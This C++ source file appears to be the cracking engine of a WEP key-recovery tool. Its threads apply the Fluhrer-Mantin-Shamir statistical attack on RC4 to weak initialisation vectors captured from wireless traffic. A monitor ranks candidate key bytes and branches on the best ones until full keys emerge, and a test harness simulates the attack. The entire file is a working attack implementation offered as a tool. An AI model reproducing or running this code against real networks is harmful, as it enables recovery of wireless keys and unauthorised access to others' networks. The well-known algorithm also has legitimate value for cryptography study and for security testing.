#include <list>
#include <vector>
#include <map>
#include <algorithm>
#include <functional>
#include <numeric>
#include <cassert>
#include <sstream>
#include <iomanip>

#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#include "WEPCrack.h"

// print secret key of len length
// (unknown bytes are printed as underscore)
string print_key(const vector<byte>& key, int len) {

	ostringstream ss;
	
	for(int i=0; i<len; i++)
		if(i<key.size())
			ss << setfill('0') << setw(2) << hex << (int)key[i];
		else
			ss << "__";

	return ss.str();
}

void* CrackThreadStart(void* obj) {
	CrackThread* ct = (CrackThread*) obj;

	ct->crack();
}

CrackThread::CrackThread(int I, int l, int N, int B, const vector<byte>& key,
		const list<WeakIV>& ivs, int debug_level): 
		I(I), l(l), N(N), B(B), key(key), IVs(ivs), hits(0), hitsFMS(0), processed(0){

	assert(I>0);
	assert(l>0);
	assert(N>0 && N<=256);
	assert(B>=0 && B<l);

	char prefix[] = "[crack/0x________] ";
	snprintf(prefix, sizeof(prefix), "[crack/%010p] ", this);
	dp.setPrefix(prefix);
	dp.setLevel(debug_level);
	
	stats = vector<int>(N, 0);

	::pthread_create(&thread, NULL, CrackThreadStart, this);
}

/* crack byte B of the WEP key
 * K is IV + cracked bytes of WEP key
 */
int CrackThread::crackByte(byte* K, byte Z, bool& two_equal) {
	int i, j, k, KB;
	byte S[N];

	for(i=0; i<N; i++) // init S-box
		S[i]=i;
	j=0;

	for(i=0; i<I+B; i++) { // do KSA until byte B
		j = j + S[i] + K[i%(I+l)]; 
		j %= N;
		swap(S[i], S[j]);

  	  	if (dp.getLevel()>4)
		  dp.printDebug2("crackByte: KSA: i=%d j=%d K=%s S=[%s]\n",
			i,j, dp.printVector("", K, I+B).c_str(),
			dp.printVector("", S, N, " ").c_str());
	}

	if ( S[1]>=i || (S[1] + S[S[1]])%N != i ) // S[1] got messed up
		return -1;

	if ( S[1] == S[S[1]] ||
	     S[1] == S[(S[1]+S[S[1]])%N] ||
	     S[S[1]] == S[(S[1]+S[S[1]])%N] )
		two_equal=true;
	else
		two_equal=false;
	
	k=find(S, S+N, Z)-S;
	assert(k<N);

	KB = k - (j + S[i]);
	while(KB<0)
		KB+=N;

	return KB;
}

int AirSnortClassify(const vector<byte>& p) {
   unsigned char sum, k;

   //test for the FMS (A+3, N-1, X) form of IV
   if (p[1] == 255 && p[0] > 2 && p[0] < 16) {
      return p[0] - 3;
   }

   //test for other IVs for which it is known that
   // Si[1] < i and (Si[1] + Si[Si[1]]) = i + n  (see FMS 7.1)
   sum = p[0] + p[1];
   if (sum == 1) {
      if (p[2] <= 0x0A) {
         return p[2] + 2;
      }
      else if (p[2] == 0xFF) {
         return 0;
      }
   }
   k = 0xFE - p[2];
   if (sum == k && (p[2] >= 0xF2 && p[2] <= 0xFE && p[2] != 0xFD)) {
      return k;
   }
   return -1;
}

void CrackThread::crack() {
	dp.printVerbose("started %s\n", print_key(key, l).c_str());
	
	list<WeakIV>::const_iterator currentIV, nextIV;

	byte K[I+l]; // RC4 key = IV + WEP(secret) key

	// get known WEP key bytes
	copy(key.begin(), key.end(), K+I);
	
	// wait while list of IVs is empty
	while (IVs.begin() == IVs.end())
		sleep(1);

	// 2 interators are needed because otherwise currentIV
	// gets stuck in IVs->end() forever
	currentIV = nextIV = IVs.begin();
	nextIV++;
	
	while(1) {
		while(nextIV != IVs.end()) {
			// check if manager is trying to stop this thread
			::pthread_testcancel();
			
			// get IV into the RC4 key
			copy(currentIV->IV.begin(), currentIV->IV.end(), K);

			// try to crack it
			bool two_equal;
			int rez = crackByte(K,currentIV->Z, two_equal);

			if (rez>=0) { // found something
				if(two_equal)
					stats[rez]+=3;
				else 
					stats[rez]++;
				hits++;

				int AS = AirSnortClassify(currentIV->IV);
			        if (AS == B) 
					hitsFMS++;

				// print verbose info
				if (dp.getLevel()>2) {
				  ostringstream ss;

			  	  ss << "#" << processed;
			  	  ss << dp.printVector(" IV=", currentIV->IV);
			  	  ss << " Z=" << setw(2) << hex << setfill('0') 
			  	    << (int)currentIV->Z << dec << setfill(' ');
				  ss << " K=" << print_key(key, B) << '<';
				  ss << setw(2) << hex << setfill('0') <<
					rez << dec << setfill(' ');
				  ss << '>';
				  for(int i=0; i<l-B-1; i++)
					ss << "__";
				  if (two_equal || AS ==B) {
					ss << " [";
					if (two_equal)
						ss << '2';
					if (AS == B)
						ss << 'A';

					ss << "]";
				  }
				
				  ss << endl;
				  dp.printVerbose("%s", ss.str().c_str());
				}
			} else if (dp.getLevel()>3) { // print debug info
				ostringstream ss;

			  	ss << "#" << processed;
				ss << dp.printVector(" IV=", currentIV->IV);
				ss << " Z=" << setw(2) << hex << setfill('0') 
				    << (int)currentIV->Z << dec << setfill(' ');
				
				ss << " gave nothing" << endl;
				dp.printDebug("%s", ss.str().c_str());
			}
			
			processed++;
			currentIV++;
			nextIV++;
		}

		dp.printVerbose("sleeping %s\n", print_key(key, l).c_str());
		sleep(1); // no new IVs so we wait a bit
		
		nextIV = currentIV;
		nextIV++;
	}
}

CrackThread::~CrackThread() {
	::pthread_cancel(thread);	// kill cracking thread
	// wait for it to die before freeing object memory thread is using
	::pthread_join(thread, NULL);

	dp.printVerbose("exiting %s\n", print_key(key, l).c_str());
}

class StatsOrdering: public binary_function<byte, byte, bool> {
	private:
		const vector<int>& stats;

	public: 
		StatsOrdering(const vector<int>& stat): stats(stat) { }
	
		bool operator() (byte x, byte y) {
			return stats[x] > stats[y];
		}
};

/* initializes S-box through KSA and generates first output byte
 * of PRGA
 */
byte rc4_Z(int I, int _l, int N, vector<byte>& secK, WeakIV& iv) {
	int l = I + _l; // RC4 key len
	byte K[ l ]; 	// RC4 key
	byte S[ N ]; 	// S-box
	int i, j; 	// RC4 counters
	
	// init key from IV and WEP key
	for(i=0; i<I; i++)
		K[i]=iv.IV[i];
	for(i=0; i<_l; i++)
		K[I+i]=secK[i];
	
	// --- KSA start ---
	for(i=0; i<N; i++) 
		S[i] = i;
	j=0;


	for(i=0; i<N; i++) {
		j = j +S [i] + K[i%l]; 
		j%=N;
		swap(S[i], S[j]);
	}
	// --- KSA end ---
	
	// first output byte of PRGA
	return S[ ( S[1]+S[S[1]] )%N ];
}

void* MonitorThreadStart(void* obj) {
	Monitor* mon = (Monitor*) obj;

	mon->monitor();
}

Monitor::Monitor(int I, int l, int N, int topN, int depthM, int forkAt, 
		int topNhi, int loadlimit,
		int debug_level, int crack_debug_level): 
  I(I), l(l), N(N), IVs(IVs), topN(topN), depth(depthM), forkLimit(forkAt),
  topNhi(topNhi), loadlimit(loadlimit) {
	assert(I>0);
	assert(l>0);
	assert(N>1 && N<=256);

	assert(topN>0);
	assert(topNhi>0);
	assert(depthM>0);
	assert(forkAt>0);
	assert(loadlimit>0);

	dp.setPrefix("[monitor] ");
	dp.setLevel(debug_level);
	crackDL = crack_debug_level;
	
	vector<byte> key(0);
	root = new CrackThread(I,l,N,0,key,IVs, crackDL);
	dp.printVerbose("started %010p (%s)\n", root, 
			print_key(key, l).c_str());
	
	::pthread_mutex_init(&keys_lock, NULL);
	::pthread_create(&monitor_thread, NULL, MonitorThreadStart, this);
};

Monitor::~Monitor() {
	// kill the monitor thread
	::pthread_cancel(monitor_thread);
	::pthread_join(monitor_thread, NULL);
	::pthread_mutex_destroy(&keys_lock);

	// kill crack threads
	while(threads.begin() != threads.end()) {
		CrackThread* ct = threads.begin()->second;

		threads.erase(threads.begin());
		delete ct;
	}
	
	// kill root crack thread
	delete root;
	root = NULL;
}

class ThreadIsCrackingByte {
	private:
		int level;
		byte b;

	public:
		ThreadIsCrackingByte(int l, byte b): level(l), b(b) { }

		bool operator() (pair<CrackThread*, CrackThread*> thr_pair) {
			CrackThread* thr = thr_pair.second;
			
			return thr->getKey()[level] == b;
		}
};

void Monitor::check_thread(CrackThread* thread, int level) {
	typedef pair<CrackThread*, CrackThread*> thread_pair;
	typedef list<thread_pair> list_t; // short aliases
	list_t kill_list; // threads to kill
	list_t::iterator ptr;

	vector<byte> key_byte(N);
	vector<int> stats = thread->getStats(); // statistics for key bytes
	iota(key_byte.begin(), key_byte.end(), 0);
	// sort possible key bytes by statistics
	sort(key_byte.begin(), key_byte.end(), StatsOrdering(stats));

	// copy all subthreads to kill list
	copy(threads.lower_bound(thread), threads.upper_bound(thread),
			insert_iterator<list_t>(kill_list, kill_list.begin()));

	int top = (level<depth)? topN : topNhi; 
	for(int i=0; i<top; i++) {
		if(stats[key_byte[i]] < forkLimit)
			continue;
		
		// find a running thread for key_byte[i]
		ptr = find_if(kill_list.begin(), kill_list.end(),
				ThreadIsCrackingByte(level, key_byte[i]));
		
		if (ptr == kill_list.end()) { // doesn't exist -> create it

			vector<byte> key = thread->getKey();
			key.push_back(key_byte[i]);

			// last byte -> generate keys, not threads
			if(level == l-1) {
				::pthread_mutex_lock(&keys_lock);
				keys.push_back(key);
				::pthread_mutex_unlock(&keys_lock);

				continue;
			}
			
			// start a new one only if loadavg < 10 for the last
			// minute - starting too many threads is EVIL
			double loadavg;
			if (getloadavg(&loadavg, 1) == 1 && loadavg<loadlimit) {
			      CrackThread* new_thr = 
			       new CrackThread(I,l,N,level+1,key,IVs,crackDL);

			      threads.insert(thread_pair(thread, new_thr));

			      dp.printVerbose("started %010p (%s)\n", new_thr,
				print_key(key, l).c_str());
			}

		} else { // exists -> remove it from kill_list
			check_thread(ptr->second, level+1);
			kill_list.erase(ptr);
		}
	}

	// kill threads left in the kill list
	while(kill_list.begin()!=kill_list.end()) {
		erase_thread_recursive(kill_list.begin()->first, 
				kill_list.begin()->second);
		kill_list.erase(kill_list.begin());
	}
}

void Monitor::erase_thread_recursive(CrackThread* parent, CrackThread* thr) {
	multimap<CrackThread*, CrackThread*> children;
	multimap<CrackThread*, CrackThread*>::iterator current;
	
	// copy children to a temp map (otherwise a race condition exists
	// that causes a segfault)
	for(current = threads.lower_bound(thr); current != threads.upper_bound(thr); current++) {
		assert(current->first == thr);
		children.insert(pair<CrackThread*, CrackThread*>(thr, current->second));
	}

	// delete children
	for(current = children.begin(); current != children.end(); current++) { 
		assert(current->first == thr);
		erase_thread_recursive(thr, current->second);
	}

	// delete thr
	for(current = threads.lower_bound(parent);
	    current!=threads.upper_bound(parent) && current->second!=thr;
	    current++);

	assert(current!=threads.upper_bound(parent));

	threads.erase(current);
	dp.printVerbose("deleting %08p (%s)\n", thr, 
			print_key(thr->getKey(),l).c_str());
	delete thr;
}

void Monitor::print_threads_recursive(CrackThread* thr, int level) {
	multimap<CrackThread*, CrackThread*>::iterator 
		current = threads.lower_bound(thr);

	ostringstream ss;
	ss << print_key(thr->getKey(), l);
	
	// --- stats ---
	vector<byte> bytes(N);
	const vector<int>& stats = thr->getStats();
	const vector<byte>& key = thr->getKey();

	iota(bytes.begin(), bytes.end(), 0);
	sort(bytes.begin(), bytes.end(), StatsOrdering(stats));

	for(int j=0; j<10; j++) {
		ss << "  ";
		ss << setw(3) << stats[bytes[j]];
		ss << '/';
		ss << setfill('0') << setw(2) << hex << (int)bytes[j];
		ss << setfill(' ') << dec;
	}

	int hits = thr->getHits();
	int processed = thr->getProcessed();
	float ratio = 0;
	if (processed) 
		ratio = 100 * (float)hits/processed; 
	ss << "     ";
	ss << setw(4) << hits << '/';
	ss << setw(8) << setiosflags(ios::left) << processed 
		<< resetiosflags(ios::left);
	ss << " (" ;
	ss << setiosflags(ios::fixed) << setprecision(4) << ratio 
		<< resetiosflags(ios::fixed);
	ss << "%)";
	
	hits = thr->getHitsFMS();
	if (processed) 
		ratio = 100 * (float)hits/processed; 
	ss << "     ";
	ss << setw(4) << hits << '/';
	ss << setw(8) << setiosflags(ios::left) << processed 
		<< resetiosflags(ios::left);
	ss << " (" ;
	ss << setiosflags(ios::fixed) << setprecision(4) << ratio << resetiosflags(ios::fixed);
	ss << "%)";

	ss << endl;

	dp.printVerbose("%s", ss.str().c_str());

	while(current!=threads.upper_bound(thr)) {
		print_threads_recursive(current->second, level+1);
		current++;
	}
}

bool Monitor::getNextKey(vector<byte>& key) {
	::pthread_mutex_lock(&keys_lock);
	if (!keys.empty()) {
		key = *keys.begin();
		keys.pop_front();
		::pthread_mutex_unlock(&keys_lock);
		return true;
	}
	::pthread_mutex_unlock(&keys_lock);

	return false;
}

void Monitor::monitor() {
	
	while(1) {
		::pthread_testcancel();

		print_threads_recursive(root, 0);
		check_thread(root, 0);

		sleep(5);
	}
}

#ifdef TEST
int main() {
	int I = 3;
	int l = 13;
	int N = 256;
	
	WeakIV iv;
	list<WeakIV> IVs;
	vector<byte> K;
	
	srand( time(NULL) ); // poor man's random seed
	
	K.push_back(0x10);
	K.push_back(0x02);
	K.push_back(0x30);
	K.push_back(0x04);
	K.push_back(0x50);
	K.push_back(0xdf);
	K.push_back(0xff);
	K.push_back(0xde);
	K.push_back(0xa4);
	K.push_back(0x3e);
	K.push_back(0xA7);
	K.push_back(0x14);
	K.push_back(0x33);

	Monitor mon(I,l,N, 3, 3, 5);
	
	int i = 0;
	while(1) {
		iv.IV.clear();
		iv.IV.push_back(rand()%N);
		iv.IV.push_back(rand()%N);
		iv.IV.push_back(rand()%N);
		
		iv.Z = rc4_Z(I,l,N, K, iv);

		mon.addIV(iv);
		
		i++;
		if (i%1000000 == 0) {
			sleep(5);
			i = 0;
		}	
	}
}
#endif // TEST
